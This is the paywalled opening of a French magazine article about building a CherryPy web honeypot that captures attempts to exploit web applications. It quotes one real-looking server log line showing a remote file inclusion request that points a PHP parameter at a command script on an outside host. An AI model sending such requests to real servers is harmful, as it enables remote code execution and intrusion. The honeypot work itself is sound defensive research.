Un web honeypot avec cherrypy

Magazine
Marque
GNU/Linux Magazine
Numéro
113
Mois de parution
février 2009


Résumé
Combien d’administrateurs système n'ont jamais vu leurs logs de serveur web polués par des requêtes HTTP moisies qui visent à exploiter des failles web sur des pages inexistantes ? Très peu, je pense. Cet article explique l'écriture d'un outil, appelé « web honeypot », qui va permettre de capturer toutes les requêtes invalides afin de les analyser et de répondre en conséquence. Ceci permettra de comprendre les intentions des pirates et, qui sait, peut-être de trouver des failles web encore méconnues du grand public (c'est beau de rêver).

69.9.37.130 - - [22/Feb/2008:00:44:05 +0100] "GET /index.php?x=http://www.hackergroup.altervista.org/cmd.txt?? HTTP/1.1" 200 2431

Cet article couvre l'écriture d'une application web, appelée « Webtrap » et écrite en Python. Cette application permet d'émuler d'autres applications web vulnérables afin de capturer toutes les tentatives d'attaques visant ces dernières. L'article commence par une présentation de Webtrap, introduit ensuite le framework de développement Cherrypy pour finir par décrire les étapes de l'écriture de Webtrap.

1. Présentation de Webtrap

1.1 Historique

La première version de Webtrap est née en 2006 lors d'un projet tuteuré de DUT [1]. Écrite en PHP, cette version avait pour but, à court terme, de récolter des statistiques sur les failles web les plus exploitées par les pirates et sur les sites vulnérables. À long terme, cette version a permis l'infiltration de quelques botnets [2] grâce aux scripts qui ont été récupérés.

1.2...

Cet article est réservé aux abonnés. Il vous reste 94% à découvrir.
à partir de 21,65€ HT/mois/lecteur pour un accès 5 lecteurs à toute la plateforme
J'en profite